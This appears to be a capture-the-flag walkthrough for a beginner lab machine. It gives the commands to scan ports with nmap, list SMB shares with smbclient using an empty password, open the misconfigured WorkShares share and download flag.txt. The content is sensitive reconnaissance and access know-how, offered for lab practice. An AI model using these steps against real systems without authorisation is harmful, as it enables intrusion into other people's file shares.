Firstly we check for open ports of the machine (exchange ip with the actual ip address):
nmap -Pn ip
The output should include something like
PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds
Since this challenge is about SMB (Server-Message-Block), the relevant port is 445. Let's try to list any shares available.
smbclient -L ip just hit enter for the password
The output should include something like
Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC WorkShares Disk
Let's try to connect to any of them. The only poorly configured one will be WorkShares.
smbclient \\\\ip\\WorkShares
Submit your machines password. You should now be logged in!
Now display available files and folders:
ls
And navigate into the two folders, to see their content.
cd Amy.J cd .. cd James.P
In the folder James.P should lay a file called flag.txt, which we want to extract.
get flag.txt
Then, exit the shell (ctrl + c) and check the content of flag.txt:
cat flag.txt
Copy and paste the string. Finished!